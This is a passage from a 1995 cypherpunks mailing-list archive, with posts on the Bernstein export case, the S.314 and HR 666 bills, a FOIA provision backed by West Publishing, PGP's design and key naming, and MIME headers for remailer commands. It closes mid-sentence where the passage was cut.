>      SLIP\PPP connection of 14,400 baud)
> 
>      Windows 3.1
> 
>      Windows-compatible audio device
> 
> SEE ALSO:
> 
> 
> [Image]  Ordering Internet Phone
> 
> [Image]  Internet Phone: Main Features
> 
> [Image]  Request More Information
> 
> [Image]  VocalTec Home Page
> 
> 
>     ------------------------------------------------------------------------
> 
> VocalTec Inc. * 157 Veterans Drive, Northvale, NJ 07647 * Tel:
> 201-768-9400 Fax: 201-768-8893 * info@vocaltec.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter F Cassidy <pcassidy@world.std.com>
Date: Fri, 10 Feb 95 10:16:28 PST
To: cypherpunks@toad.com
Subject: Bernstein! Where are YOU!
In-Reply-To: <199502101742.MAA05625@pipe3.pipeline.com>
Message-ID: <Pine.3.89.9502101309.A13216-0100000@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain


Friends - and Bernstein,
-	I am a writer on assignment from the Economist writing about a 
certain cryptographers' tussle with the State Department, a fellow who is 
known around the beltway crypto-anarchy, privacy, 
niceness-on-the-Internet advocacy crowds as Bernstein. I have the outline 
of the case from the attorney's handling it. But my editors would really 
like to be able to name the party and sketch his background. All I have 
now is a last name, that he is a professor/and/or graduate student at UC 
Berkeley and is being roughed up by the State Department. Can anyone here 
- or the hero of the hour himself - come forward and help me complete my 
assignment?
-					Regards,
-						Peter Cassidy

-	PS: By the way, thanks to the guys who helped me shore up some 
basic concepts for the pieces I've done for OMNI and the Covert Action 
Quarterly that have touched on cryptography. Weirdly, one editor actually 
knew the fellow from Texas that I'd interviewed on technical points. 
(They worked together on a newspaper. What a ruck!)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 10 Feb 95 10:22:33 PST
To: Peter F Cassidy <pcassidy@world.std.com>
Subject: Re: Bernstein! Where are YOU!
In-Reply-To: <Pine.3.89.9502101309.A13216-0100000@world.std.com>
Message-ID: <9502101822.AA13995@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



I have never heard of such an individual, and I strongly suspect I
would have heard of them. I believe you have the name and details
wrong if the individual you are looking for exists at all.

Perry

Peter F Cassidy says:
> Friends - and Bernstein,
> -	I am a writer on assignment from the Economist writing about a 
> certain cryptographers' tussle with the State Department, a fellow who is 
> known around the beltway crypto-anarchy, privacy, 
> niceness-on-the-Internet advocacy crowds as Bernstein. I have the outline 
> of the case from the attorney's handling it. But my editors would really 
> like to be able to name the party and sketch his background. All I have 
> now is a last name, that he is a professor/and/or graduate student at UC 
> Berkeley and is being roughed up by the State Department. Can anyone here 
> - or the hero of the hour himself - come forward and help me complete my 
> assignment?
> -					Regards,
> -						Peter Cassidy
> 
> -	PS: By the way, thanks to the guys who helped me shore up some 
> basic concepts for the pieces I've done for OMNI and the Covert Action 
> Quarterly that have touched on cryptography. Weirdly, one editor actually 
> knew the fellow from Texas that I'd interviewed on technical points. 
> (They worked together on a newspaper. What a ruck!)
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wei Dai" <weidai@eskimo.com>
Date: Fri, 10 Feb 95 13:33:34 PST
To: cypherpunks@toad.com
Subject: law vs technology
Message-ID: <199502102133.AA16472@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Recently there's been a great deal of discussion on this list
about upcoming legislations (HR666 S314 etc.).  Maybe it's time
to step back a little and look at the bigger picture.  I've
been assuming (perhaps incorrectly) for some time that most
cypherpunks hold a belief somewhat like the following:

There has never been a government that didn't sooner or later
try to reduce the freedom of its subjects and gain more control
over them, and there probably never will be one.  Therefore,
instead of trying to convince our current government not to
try, we'll develop the technology (e.g., remailers and ecash)
that will make it impossible for the government to succeed.
Efforts to influence the government (e.g., lobbying and
propaganda) are important only in so far as to delay its
attempted crackdown long enough for the technology to mature
and come into wide use.

But even if you do not believe the above is true, think about
it this way:  If you have a certain amount of time to spend on
advancing the cause of greater personal privacy (or freedom, or
cryptoanarchy, or whatever), can you do it better by using the
time to learn about cryptography and develop the tools to
protect privacy, or by convincing your government not to invade
your privacy?  I argue that since there are many more people
doing the former (EFF, CPSR, etc) than latter, that you'd be
more effective if you spent the time on the former.

Wei Dai


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzvayTl0sXKgdnV5AQEBvAP+MqsGer5pg2xM6+pYG7DgCSttUyAoG8I6
Hm/atFUdRauZ1WREpi3XTXEmNgT9m+QuON5+6rnUrfkizAdjr9EPFnXxMa8am8TZ
W7iQBuKb/KktbClbQyKzndeAOQ3oIOi4ahdn5eseOCWc3wX/WcjR6w9WJ6yPWoTJ
6fcglCGgo/8=
=Pc1V
-----END PGP SIGNATURE-----

E-mail: Wei Dai <weidai@eskimo.com>   URL: "http://www.eskimo.com/~weidai"
=================== Exponential Increase of Complexity ===================
--> singularity --> atoms --> macromolecules --> biological evolution
--> central nervous systems --> symbolic communication --> homo sapiens
--> digital computers --> internetworking --> close-coupled automation
--> broadband brain-to-net connections --> artificial intelligence
--> distributed consciousness --> group minds --> ? ? ?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: storm@marlin.ssnet.com (Don Melvin)
Date: Fri, 10 Feb 95 14:59:11 PST
To: cypherpunks@toad.com
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <Pine.3.89.9502081213.A7848-0100000@netcom10>
Message-ID: <qAxElKJXYb$E078yn@ssnet.com>
MIME-Version: 1.0
Content-Type: text/plain



In article <Pine.3.89.9502081213.A7848-0100000@netcom10>,
"James A. Donald" <jamesd@netcom.com> wrote:
>  (B) by striking out `makes any comment, request,
>         suggestion, or proposal' in subparagraph (A) and inserting
>         `makes, transmits, or otherwise makes available any comment, request,
>                 ^^^^^^^^^^
>          suggestion, proposal, image, or other communication'; 
> 
> This appears to make ISP's responsible for content.
> 
> It makes them responsible for something that they cannot 
> control without violating people privacy.

Plus the processing cost would place a tremendous burden on the 'net.
Transmision goes both ways, not just from the posting machine to the
rest of the world.  Every site 'transmits' every piece of news posted
to the newsgroups they carry.  Every intermediate site, especially
the backbones, 'transmits' email even in not generated from or
addressed to that site.

--
America - a country so rich and so strong we can reward the lazy 
          and punish the productive and still survive (so far)

Don Melvin                  storm@ssnet.com                finger for PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Fri, 10 Feb 95 10:36:41 PST
To: lethin@ai.mit.edu (Rich Lethin)
Subject: Re: Global Filesystem Guild
In-Reply-To: <9502101722.AA04330@grape-nuts>
Message-ID: <199502101839.NAA24397@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain



>
>To reduce the vulnerability of a single user/BBS to having their files
>confiscated/stolen, could a distributed WAN filesystem be implemented with
>k-redundancy, e.g. the files wouldn't disappear until k servers (located in
>various unknown or inaccessible places) failed?  The price of storage would
>vary with the level of redundancy desired.  For security the servers would
>only store cyphertext, etc.  Local cacheing to reduce network load.
>

You've brought up three separate issues - fault-tolerance,  secrecy and
secret sharing.  They are probably best dealt with separately, for the
purposes of understanding them as well as implementing them.

There are replicating file systems that provide the kind of fault
tolerance that you seem to be looking for, although I'm not aware
of any "production grade" systems that can replicate read-write
files in any reasonable way.  Done right, such a system would
probably involve guarantees, implemented partially at the server
side, that a file has been replicated in some number of places
prior to any write operation returning.  You could kludge this at
the client side alone by just modifying your file system interface
to make an approprate number of replicas each time something is
written.  There are a whole bunch of issues surrounding failure
semantics - how do you handle writes when one of the replica servers
is unavailable, and so on.

Secrecy, on the other hand, is best thought of as a client-side
issue, and can be handled with existing client file system encryption
tools that run at the client file system interface level.  For
example, on Unix clients, CFS can store its underlying data on most
any remote file system, and requires no changes or special attention
from the server side.  I have no idea whether the various PC
encrypting file systems (SFS, etc) that have since come along
separate their functions from the low-level storage in a way that
makes it possible to use them with remote file servers, but there's
probably no reason you couldn't build such a system if one didn't
already exist.  The main issue in practice is key management.
Depending on the application, you might want to back up keys under
some secret sharing scheme that allows keys to be recovered by some
subset of key holders.  This is especially important for commercial
applications.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 10 Feb 95 11:48:45 PST
To: Peter F Cassidy <pcassidy@world.std.com>
Subject: Re: Bernstein! Where are YOU!
In-Reply-To: <Pine.3.89.9502101309.A13216-0100000@world.std.com>
Message-ID: <9502101846.AA14694@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Actually, it is possible that you are talking about Dan Bernstein
(djb@silverton.berkeley.edu), but to my knowledge he hasn't had any
criminal problems with the state department. He's just requested some
export licenses that have been refused.

Perry

Peter F Cassidy says:
> Friends - and Bernstein,
> -	I am a writer on assignment from the Economist writing about a 
> certain cryptographers' tussle with the State Department, a fellow who is 
> known around the beltway crypto-anarchy, privacy, 
> niceness-on-the-Internet advocacy crowds as Bernstein. I have the outline 
> of the case from the attorney's handling it. But my editors would really 
> like to be able to name the party and sketch his background. All I have 
> now is a last name, that he is a professor/and/or graduate student at UC 
> Berkeley and is being roughed up by the State Department. Can anyone here 
> - or the hero of the hour himself - come forward and help me complete my 
> assignment?
> -					Regards,
> -						Peter Cassidy
> 
> -	PS: By the way, thanks to the guys who helped me shore up some 
> basic concepts for the pieces I've done for OMNI and the Covert Action 
> Quarterly that have touched on cryptography. Weirdly, one editor actually 
> knew the fellow from Texas that I'd interviewed on technical points. 
> (They worked together on a newspaper. What a ruck!)
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Fri, 10 Feb 95 11:08:17 PST
To: Black Unicorn <unicorn@access.digex.net>
Subject: Re: The question is moot: (Was: Not crypto, but scary.)
In-Reply-To: <Pine.SUN.3.91.950210010704.5527A-100000@access3.digex.net>
Message-ID: <Pine.SUN.3.91.950210135809.26929B-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 10 Feb 1995, Black Unicorn wrote:

[about HR 666]

> The bill is really just a restatement.  This has been the state of the 
> law for 11 years now.

Right - it is time to change the law.  HR 666 won't help in that direction.


-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 10 Feb 95 14:05:41 PST
To: cypherpunks@toad.com
Subject: Re: MIME based remailing commands
In-Reply-To: <9502102057.AA11903@cfdevx1.lehman.com>
Message-ID: <199502102205.OAA04014@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Rick Busdiecker <rfb@lehman.com> writes:
>Could one of the MIME supporters (I guess that would be `most
>everybody') explain why anything more than a To: header and an
>encrypted block is desireable for the in-the-clear message?

For one thing, you might want to know that you have an encrypted
message on your hands and not just somebody's misfired GIF.  For
another, you might want to know where the encrypted block begins and
where it ends.  You might also want to have information about what
kind of encoding has been done on the output of the encryption (base64,
uuencode, leave it as pure 8-bit binary, etc.)  And you might want to
have information about what kind of encryption was used, what key
was used, etc., in case you are supporting multiple encryption
formats and keys.

PGP, FYI, does include most of this information in the clear, albeit some
in binary format.

This information is generally needed for the receiver to successfully
decode and receive the message, so it does have to be in the clear.  Now,
there may be some circumstances where this is not desired, and where you
really do just want to hand the receiver a block of apparently random
data, with no indications whatsoever what it is.  Then by some
out-of-band means you have to have arranged with the receiver that he
will know exactly what transformation to do to get back the original
data.  For that I suppose you could just use text/plain (or something
like application/data?), and it looks as opaque as could be desired.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLzvjARnMLJtOy9MBAQFxigIAyzjDVvkgb85h2gbEMqAjuATlNGo1V1u0
YQdlJannRuUX+p0kXepHJ7101ROKFUjPwCjGZXNFFmvWvGz7tByoMw==
=aj4b
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: storm@marlin.ssnet.com (Don Melvin)
Date: Fri, 10 Feb 95 14:59:09 PST
To: cypherpunks@toad.com
Subject: Re: S. 314 and existing situation
In-Reply-To: <Pine.LNX.3.91.950209140130.8757A-100000@chewy.wookie.net>
Message-ID: <AbxElKJXYzk0078yn@ssnet.com>
MIME-Version: 1.0
Content-Type: text/plain



In article <Pine.LNX.3.91.950209140130.8757A-100000@chewy.wookie.net>,
slowdog <slowdog@wookie.net> wrote:
> 
> Hard to tell from this bill what the deal is on this. Common carriers 
> aren;t completely immune from prosecution or lawsuit or whatnot to begin 
> with. But in addition, S.314 introduces "transmit or otherwise make 
> available" into the language of the law. Which makes the -carrier- of the 
> "offending" information responsible.

Interesting point, there.

Following from that:

        Telecoms have bucks.
        Telecoms have lawyers.
        Telecoms are the 'transmission' agents for pretty much all of
                the internet. Even high speed dedicated T1s are usually
                from a telecom or two.

Can we get them involved?

--
America - a country so rich and so strong we can reward the lazy 
          and punish the productive and still survive (so far)

Know your Constitution (void where prohibited)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard F. Dutcher" <rfdutcher@igc.apc.org>
Date: Fri, 10 Feb 95 14:10:42 PST
To: cypherpunks@toad.com
Subject: Laws, Feds, & the Internet
Message-ID: <199502102211.OAA22129@mail.igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain



The following was in today's San Francisco Chronicle.  BTW, quoting 
the entire article as I have done is probably a violation of "fair 
use" - but de minimis ...

All under *current* law, folks.

[hmmm -- encryption doesn't do much for exhibitionists and 
braggarts, does it?  ;-]

==============================

MAN JAILED FOR INTERNET MESSAGES

Associated Press

Detroit

	A college student was charged yesterday with posting computer 
messages describing the imaginary binding, rape, torture and murder 
of a woman who used to be in his Japanese class.

	"Torture is foreplay, rape is romance, snuff (killing) is climax," 
prosecutors say one of Jake Baker's messages read.

	The student, 20, was charged with the federal crime of transmitting a 
threat to injure.  He was jailed pending a bond hearing today.

	Baker, who was suspended from the University of Michigan last week,
told reporters he was within his rights to post the messages on the
Internet.  By posting the messages, he gave other Internet users
access to them.

	If convicted, Baker could be sentenced to up to five years in 
prison.  The name of the woman was not released.

==================================

===================================
Rich Dutcher, San Francisco Greens
P.O. Box 77005, San Francisco, California 94107 USA

"That's libertarians for you - anarchists who want police protection from their slaves."
                          Kim Stanley Robinson, "Green Mars"

Greens, of course, only enslave plants - so weed-whackers work better than cops ...
====================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hendrix@acs.bu.edu
Date: Fri, 10 Feb 95 11:39:10 PST
To: cypherpunks@toad.com
Subject: Re: HR830 - Anyone tracking this?
Message-ID: <199502101934.OAA62015@acs-mail.bu.edu>
MIME-Version: 1.0
Content-Type: text/plain


> 
>The recent version of the EFFector Online had some information about the
>House of Representative's Bill HR830.  They say that this bill is being
>rammed through Congress and would cripple FOIA.  It would seemingly 
>change any public information that is given value to non-public
>information.  Does anyone have any further information?  
> 
>Mike 
>
In response to your post I am passing on some info that came my way on 
Tuesday, please excuse the length. Apart from the message below there is a 
letter written by James Love of TAP to Honorable William Clinger, Jr. the 
Chairman of the Committee on Government Reform and Oversight, but due to 
it's length I have not included it here. I can E-mail it to anyone who is 
interested. 

                                Julian Burke



------- Forwarded Message Follows -------

Date sent:      Tue, 7 Feb 1995 02:45:55 -0800
Send reply to:  love@Essential.ORG
From:           James Love <love@Essential.ORG>
To:             Multiple recipients of list <law-lib@ucdavis.edu>
Subject:        Help! West Publishing seeks broad change in FOIA (fwd)
Originally to:  law librarians <law-lib@ucdavis.edu>,


Distributed to TAP-INFO, a free Internet Distribution List
(subscription requests to listproc@tap.org) 

TAXPAYER ASSETS PROJECT - INFORMATION POLICY NOTE
CROWN JEWELS CAMPAIGN - Juris, Legal Information
February 7, 1995

We need help from everyone!!!!!!!!  Please distribute this
widely.  jamie love   (love@tap.org, 610/658-0880 or 202/387-
8030)


-    Hearings set for today (Tuesday February 7) on bill
     containing special interest provision for West Publishing. 
     Hearings will be held before the subcommittee on "Regulatory
     Affairs."

-    House republicans have slated quick action on the bill. 
     Subcommittee Mark-up is set for thursday and full committee
     mark-up is set for friday.  (Telephone and Fax numbers of
     committee members given below)

-    House republicans introduce legislation with a section
     requested by West Publishing that will provide sweeping
     changes in federal freedom of information act, and prevent
     federal agencies from creating a public database that use
     the West Publishing page numbers to reference case law.

-    The "West Provision" would also end its lawsuit with Tax
     Analyst, a Virginia publisher, who is seeking access to the
     Department of Justice JURIS database of court decisions in
     order to put the information into the public domain.  Tax
     Analysts alleges the JURIS database of court decisions are
     subject to FOIA and not protected by copyright.  A victory
     by Tax Analysts in this case will lead to a public domain
     database of federal court decisions.

-    The West Provision in the legislation would extend far
     beyond West Publishing's struggle to maintain its grip on
     the market for legal information.  It would exclude all
     contractor generated records from the federal Freedom of
     Information Act.  Examples of databases that would be
     affected by provision would be the SEC's EDGAR database and
     the Department of Education ERIC database.

-    Help needed in removing this special interest provision. 
     Telephone and fax numbers for the Subcommittee on Regulatory
     Affairs are given below.

>From best we can determine, the so called "Paperwork Reduction
Act" bill was introduced late yesterday or will be introduced
early today.  We do not have a bill number yet.  There will be a
hearing on today (Tuesday February 7) before the "Subcommittee on
National Economic Growth, Natural Resources, and Regulatory
Affairs," more commonly referred to as the subcommittee on
"Regulatory Affairs."  Subcommittee Mark-up is set for thursday
and full committee (the apparently misnamed Committee on
Government Reform and Oversight) mark-up is set for friday.

A provision in this bill [Section 3518 (f) of the "Chairman's
Mark"] would do the following.

     If any person "adds value" to public information, the
     federal government would not have "any right to obtain,
     collect, acquire, disseminate, use or convert," the
     data, database or information product, or "any method
     used by the person to identify such resulting data,
     databases or information product," except "under terms
     that are expressly agreed to by such person."

This provision is being sold as a simple restatement of the law,
but that is a far from true (or more bluntly, a lie).  The
provision in the bill is so broad that it covers all contractor
performed work on behalf of agencies, and effectively exempts
contractor generated records from the federal Freedom of
Information Act (FOIA).  For example, since LEXIS "adds value" to
the EDGAR database by taking the incomming filings from the
government and putting them in a database, even if the government
had a copy of the database, it could not dissmeinate the records
without the consent of LEXIS.  Likewise, many databases, such as
the Department of Education ERIC database, are largely put
together by private contactors.  Indeed, if Oliver North had used
a private contractor for the White House email system, those
records would appear to be off limits to both FOIA and a
government supeana.  Moreover, the provison would apply even in
cases where the firm did not have a copyright or any other
protectable intellectually property right, a huge change in
federal law.

The provision would specifically apply to an active federal
lawsuit between West Publishing and Tax Analysts, over the
Department of Justice JURIS database.  West Publishing was a
contractor on JURIS, an online system run by the Department of
Justice, which contains several decades of federal court
decisions.  West Publishing is trying to prevent Tax Analysts
from obtaining copies of court decisions contained in the
government's JURIS database.  Tax Analyst believes the records
are subject to FOIA, and not protected by copyright.  If Tax
Analysts (fmi, Tom Field, 703/533-4400 or Eleanor Lewis 301/652-
3453) wins the law suit, which has been very expensive, it plans
to put the data into the public domain, creating a public
database of federal court decisions -- something that West
Publishing is fighting against.  Moreover, the West assertion of
its copyright of legal citations is being challenged in federal
court in New York by Hyperlaw, a small CD-ROM publisher (fmi,
Alan Sugarman, President, 212/877-1371, sugarman@panix.com).  If
Sugarman wins his case, the West provision would prevent the
Department of Justice from using the West citations in a public
database.


---------------------------------------------------------------------
TAP-INFO is an Internet Distribution List provided by the Taxpayer
Assets Project (TAP).  TAP was founded by Ralph Nader to monitor the
management of government property, including information systems and
data, government funded R&D, spectrum allocation and other government
assets.  TAP-INFO reports on TAP activities relating to federal
information policy.  tap-info is archived at essential.org
and cpsr.org.

Subscription requests to tap-info to listproc@tap.org with
the message:  subscribe tap-info your name
---------------------------------------------------------------------
Taxpayer Assets Project; P.O. Box 19367, Washington, DC  20036
v. 202/387-8030; f. 202/234-5176; internet:  tap@tap.org
---------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: xpat@vm1.spcs.umn.edu
Date: Fri, 10 Feb 95 12:42:13 PST
To: cypherpunks@toad.com
Subject: Re: West (was:HR830 - Anyone tracking this?)
Message-ID: <9502102042.AA20803@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>-    House republicans introduce legislation with a section
>     requested by West Publishing that will provide sweeping
>     changes in federal freedom of information act, and prevent
>     federal agencies from creating a public database that use
>     the West Publishing page numbers to reference case law.

Well, the West citation system *is* proprietary, without a doubt.
This is a case where ease-of-use has completely dominated. Court
records are completely laced with West citations.

>-    The "West Provision" would also end its lawsuit with Tax
>     Analyst, a Virginia publisher, who is seeking access to the
>     Department of Justice JURIS database of court decisions in
>     order to put the information into the public domain.  Tax
>     Analysts alleges the JURIS database of court decisions are
>     subject to FOIA and not protected by copyright.  A victory
>     by Tax Analysts in this case will lead to a public domain
>     database of federal court decisions.

The Tax Analyst lawsuit: destined to fail from the start.
If they want to do this they will have to come up with their own
indexing/citation system, and then get everyone to adapt to it.
About as likely as putting 73v AC wiring in every home in America.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Fri, 10 Feb 95 11:48:38 PST
To: Eric Hollander <hh@xcf.berkeley.edu>
Subject: Re: why pgp sucks
In-Reply-To: <9502101849.AA21833@xcf.Berkeley.EDU>
Message-ID: <199502101951.OAA28877@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain



>if i use a command like
>
>	pgp filename
>
>it will automatically figure out the right thing to do with the file.  if
>it's encrypted, and i have the key, it will attempt to decrypt it.  if it
>contains keys, it will ask if i want to add them to my keyring.  if it's
>signed, it checks the signature.
>
>this sucks!
>
>if i'm trying to write a program to automatically process incoming mail (for
>instance, to see if it's encrypted with a specific key), i certainly don't
>want to have the possibility of people being able to add garbage to my
>keyring just by mailing it to me.
>
...

PGP suffers from its failure to separate cleanly its primary
mechanism (encrypting and signing messages) from policy (what to
do with those signed and encrypted mechansims).  Without a clean
separation, the mechanism is limited to use in those applications
narrowly envisioned by the system's authors.  Of course, PGP is
hardly unique here; designing clean interfaces and separation-of-
functions isn't easy, and its even harder in the face of meeting
the needs of an existing installed base of first-generation users.

Personally, I'd much rather see a suite of tools: an encryption/signature
tool (or maybe tools - let me apply them in whatever order is
approprate), a decryption verification tool, a certificate management
system that operates on messages signed with the signature tool and a
top level that glues all this together and implements local policy
(like what consitutes a valid signature, key revocation, etc).  If
we had a system that worked like this,, we could more easily create
richer key certificates that specify restrictions on what is being
signed, revocation conditions, etc.  (As it is, there isn't even
any way for a key signer to revoke a signature, let alone describe
what purpose the signature exists for.)

Of course, you could probably build all this ON TOP of the existing
pgp and pem, but you'd still be left with bloated underlying tools
that implement more policy than they need to.

Oh well.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 10 Feb 95 11:58:46 PST
To: cypherpunks@toad.com
Subject: Re: why pgp sucks
In-Reply-To: <199502101951.OAA28877@crypto.com>
Message-ID: <9502101958.AA15039@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Matt Blaze says:
> PGP suffers from its failure to separate cleanly its primary
> mechanism (encrypting and signing messages) from policy (what to
> do with those signed and encrypted mechansims).  Without a clean
> separation, the mechanism is limited to use in those applications
> narrowly envisioned by the system's authors.
[...]
> Personally, I'd much rather see a suite of tools: an encryption/signature
> tool (or maybe tools - let me apply them in whatever order is
> approprate), a decryption verification tool, a certificate management
> system that operates on messages signed with the signature tool and a
> top level that glues all this together and implements local policy
> (like what consitutes a valid signature, key revocation, etc).  If
> we had a system that worked like this,, we could more easily create
> richer key certificates that specify restrictions on what is being
> signed, revocation conditions, etc.

I've been saying this for a long time, and I want to triple-reiterate
it -- PGP needs to be broken down into simple Unix-philosophy style
tools, or it isn't going to be useful in the long run.

I'll also note, yet again, that unless PGP quits this bad practice of
identifying counterparties only by a number, it is NOT going to be
universally deployed. Counterparties need to be identified by a name
that can be looked up in the DNS -- meaning "joe@foo.com" rather than
some key ident number.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Erich von Hollander <erich@CSUA.Berkeley.EDU>
Date: Fri, 10 Feb 95 15:03:31 PST
To: Derek Atkins <warlord@mit.edu>
Subject: Re: why pgp sucks
In-Reply-To: <9502102058.AA07955@josquin.media.mit.edu>
Message-ID: <199502102303.PAA24281@soda.CSUA.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


In message <9502102058.AA07955@josquin.media.mit.edu>, Derek Atkins writes:
>
>> if i use a command like
>> 
>> 	pgp filename
>
>The problem is that you are using the wrong command....

hal pointed out to me that

	pgp -F

will do exactly what i want.  it will work.  the behavior of pgp -F (given
keys, for instance) is not well-described in the docs, but it will do what i
want it to.

as hal said, i can catch the stdout for the data, and catch the stderr for
out-of-band info about the data, and this will work fine.

and the product of all this is going to be quite cool.  i'll post it when
it's finished.

e




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Fri, 10 Feb 95 12:20:29 PST
To: Hal <hfinney@shell.portal.com>
Subject: Re: MIME based remailing commands
In-Reply-To: <199502082037.MAA02640@jobe.shell.portal.com>
Message-ID: <9502102017.AA11002@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Wed, 8 Feb 1995 12:37:54 -0800
    From: Hal <hfinney@shell.portal.com>
    
    Nathaniel Borenstein <nsb@nsb.fv.com> writes:

    Right now we are basically having the remailing commands be mail
    header fields.  But really people aren't supposed to just make up
    new fields like that.  I think the "name space" of these fields is
    protected somewhat more than many other aspects of communication
    protocols on the net.

If you start your header name with X-, then you are conforming that
gross, ugly atrocity that is MIME.  And yet, by using headers rather
than TGUATIM, you help to preserve sanity and avoid that vast majority
of MIME slime.

Note that I'm not suggesting that MIME has no place.  When you truly
need to mix data types and you *want* the different parts to be easily
processed by all, it makes perfect sense.

Given the privacy goals of a remailing, MIME has only disadvantages.

    Is there precedent for adding service-by-mail functionality in
    this way?  I am not completely comfortable with it.  And as we
    think of new functionality and new commands they all have to get
    added at this top level, the same visibility and name space as
    "Subject", "From", and "To".

So, do what you have to in C and C++-sans-namespaces, use a prefix.
X-RM- could prefix the Remailer namespace.  It's ugly, but compared to
the alternative it is pure beauty.
    
--
Rick Busdiecker <rfb@lehman.com>      Please do not send electronic junk mail!
  Lehman Brothers Inc.
  3 World Financial Center  "The more laws and order are made prominent, the
  New York, NY  10285-1100   more thieves and robbers there will be." --Lao Tzu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 10 Feb 95 12:36:40 PST
To: Hal <hfinney@shell.portal.com>
Subject: Re: why pgp sucks
In-Reply-To: <199502102031.MAA21422@jobe.shell.portal.com>
Message-ID: <9502102036.AA15222@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Hal says:
> "Perry E. Metzger" <perry@imsi.com> writes:
> >I'll also note, yet again, that unless PGP quits this bad practice of
> >identifying counterparties only by a number, it is NOT going to be
> >universally deployed. Counterparties need to be identified by a name
> >that can be looked up in the DNS -- meaning "joe@foo.com" rather than
> >some key ident number.
> 
> PGP of course looks up keys by strings in addition to numbers.  A widely
> accepted practice is to use <joe@foo.com> in the user ID which allows the
> lookups to be by internet address.

The problem is that incoming messages are tagged with the number, not
the string. You can't check the signature if you don't have the number
in your own database. Global databases don't scale. Distributed
databases like DNS do scale. DNS style naming doesn't hurt non-DNS
users, so its a shame that it isn't there -- I, for one, can't specify
PGP style keys in the internet key management system I'm working on
because of this.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Fri, 10 Feb 95 12:42:18 PST
To: "P. M. Dierking" <xpat@vm1.spcs.umn.edu>
Subject: Re: MIME based remailing commands
In-Reply-To: <9502082251.AA03118@toad.com>
Message-ID: <9502102039.AA11466@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date:         Wed, 08 Feb 95 16:37:06 CST
    From: xpat@vm1.spcs.umn.edu
    
    I say take the remail stuff out of the header altogether,
    MIME or not.

If by this, you mean to follow more of the model used by
remail@extropia.wimsey.com, then I completely agree.  What travels in
the clear should not *require* any header data.  It could even include
misleading headers.  A remailer should be able to accept mail which is
encrypted for it.  It can then decode the encrypted part and discard
the rest.  The format of the decrypted message could be whatever works
best for remailers which might or might not have anything at all to do
with MIME.

OTOH, if you are going to have information in the clear to support
naive users or whatever, put the information in the header.  The whole
purpose of headers is for auxiliary information about the message and
its delivery.  The body is for the message itself.

With MIME's approach of making every piece of information as big and
clunky as possible, I'm mildly suprised that it hasn't done away with
headers altogether :-)

--
Rick Busdiecker <rfb@lehman.com>      Please do not send electronic junk mail!
  Lehman Brothers Inc.
  3 World Financial Center  "The more laws and order are made prominent, the
  New York, NY  10285-1100   more thieves and robbers there will be." --Lao Tzu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Fri, 10 Feb 95 12:46:16 PST
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: MIME based remailing commands
In-Reply-To: <9502082303.AA10796@snark.imsi.com>
Message-ID: <9502102043.AA11506@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Wed, 08 Feb 1995 18:03:57 -0500
    From: "Perry E. Metzger" <perry@imsi.com>

    xpat@vm1.spcs.umn.edu says:
    > IMHO, an ideal message would have the ability to handle nested objects
    > of varying types, MIME is only a start.

    What is it precisely that you might want to encapsulate that MIME
    can't encapsulate?

And in what way does MIME encapsulation aid in the privacy goals of
remailing?

It seems far more likely to require that you expose information which
you might prefer not to expose, much as the Privacy Enhanced Mail
